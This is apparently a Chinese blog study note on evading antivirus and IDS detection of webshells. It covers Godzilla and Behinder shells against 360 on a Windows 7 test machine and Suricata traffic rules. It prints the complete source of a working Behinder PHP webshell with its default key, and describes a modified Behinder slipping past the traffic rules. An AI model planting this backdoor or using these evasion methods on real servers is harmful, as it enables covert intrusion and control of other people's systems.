当前位置: 首页 > web >正文

免杀学习篇(1)—— 工具使用

一、前言

先借用免杀工具来了解webshell上传和操作执行会遭到查杀的几个阶段,使用windows7 x64(360安全卫士13)来作为测试机。主要内容参考小迪安全课程:第144天:免杀对抗-Webshell篇&静态查杀&行为拦截&流量监控&代码混淆&内存加载&工具魔改_哔哩哔哩_bilibili

二、工具

用到的主要是one-fox集成工具箱,其中内置的webshell工具:冰蝎、哥斯拉、蚁剑

免杀工具是:XG拟态WEB免杀工具

三、 学习部分

首先开启windows7的web服务

1.Godzilla马(表面代码)

从工具箱中生成一个木马上传到windows的WWW目录下

立刻会被360检测到,立马被查杀的,这里应该称为表面代码层的查杀

2.Godzilla马初步免杀(操作行为)

对上述木马放入XG拟态中进行免杀

发现此时不会被查杀掉,用哥斯拉连接一下,但当尝试危险操作

 

发现进行危险操作会被监测到,就是操作行为被检测到了

3.冰蝎连接(工具指纹)

 上传一个冰蝎马

<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>

用冰蝎进行连接

此时需要使用suricata工具来监测,这里我是用kali搭建的suricata监听,然后导入了github上的规则库:al0ne/suricata-rules: Suricata IDS rules 用来检测红队渗透/恶意行为等,支持检测CobaltStrike/MSF/Empire/DNS隧道/Weevely/菜刀/冰蝎/挖矿/反弹shell/ICMP隧道等

 

将冰蝎的特征导入suricata的规则库中:/etc/suricata/rules

suricata开始监听冰蝎的流量:

suricata -c /etc/suricata/suricata.yaml -i eth0 -s /etc/suricata/rules/Behinder3.rules

在冰蝎webshell中进行一些操作

 

查看suricata的fast.log日志

发现成功监听到了冰蝎的流量

 4.冰蝎魔改(绕过对流量的监测)

用冰蝎魔改版来上传shell和执行,先上传冰蝎魔改版shell,然后执行操作

 此时再次看suricata的日志记录

发现此时不会发现冰蝎魔改版的流量 

四、总结

第一部分内容主要是先熟悉一下一个大概的免杀流程以及webshell可能会被监测到的三个层面:表面代码层(混淆)、操作行为层(魔改)、工具指纹层(魔改),之后会跟着小迪安全学习后续内容。

 

 

 

 

http://www.xdnf.cn/news/15599.html

相关文章:

  • 网页源码保护助手 海洋网页在线加密:HTML 源码防复制篡改,密文安全如铜墙铁壁
  • 基于华为欧拉系统安装FileGator文件管理器
  • 【Android】日志的使用
  • 深度学习中的激活函数:从原理到 PyTorch 实战
  • python 基于 httpx 的流式请求
  • 场景设计题+智力题
  • [Science]论文 视黄素与细胞修复
  • C++回顾 Day7
  • PyCharm 高效入门指南:从安装到效率倍增
  • [面试] 手写题-对象数组根据某个字段进行分组
  • 学习嵌入式的第二十八天-数据结构-(2025.7.15)进程和线程
  • P3842 [TJOI2007] 线段
  • Web攻防-PHP反序列化字符逃逸增多减少成员变量属性解析不敏感Wakeup绕过
  • 高等数学强化——导学
  • Android中Launcher简介
  • deepseekAI对接大模型的网页PHP源码带管理后台(可实现上传分析文件)
  • ASP .NET Core 8结合JWT轻松实现身份验证和授权
  • SpringBoot 实现 Redis读写分离
  • “C21988-谷物烘干机(2D+3D+说明书+运动仿真)8张cad+设计说明书
  • pytorch学习笔记(四)-- TorchVision 物体检测微调教程
  • 常用高频指令总结
  • iOS App 上架工具选型与跨平台开发 iOS 上架流程优化实录
  • 视频HDR技术全解析:从原理到应用的深度探索
  • 【时时三省】(C语言基础)通过指针引用多维数组
  • 视频编码中熵编码之基于上下文的变长编码(Huffman霍夫曼编码和指数哥伦布)
  • 网络编程-epoll模型/udp通信
  • css 边框颜色渐变
  • 【linux V0.11】init/main.c
  • JAVA青企码协会模式系统源码支持微信公众号+微信小程序+H5+APP
  • Spring MVC 执行流程详解:一次请求经历了什么?